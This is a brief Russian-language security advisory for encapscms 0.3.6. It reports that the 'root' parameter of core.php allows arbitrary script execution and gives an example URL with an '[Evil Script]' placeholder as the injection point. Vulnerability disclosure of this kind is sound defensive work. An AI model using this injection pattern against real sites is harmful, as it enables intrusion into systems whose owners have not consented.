Программа: encapscms 0.3.6
Уязвимость позволяет злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в обработке входных данных в параметре «root» сценарием core.php.
Пример:
http://www.site.com/encapscms_PATH/core/core.php?root=[Evil Script]
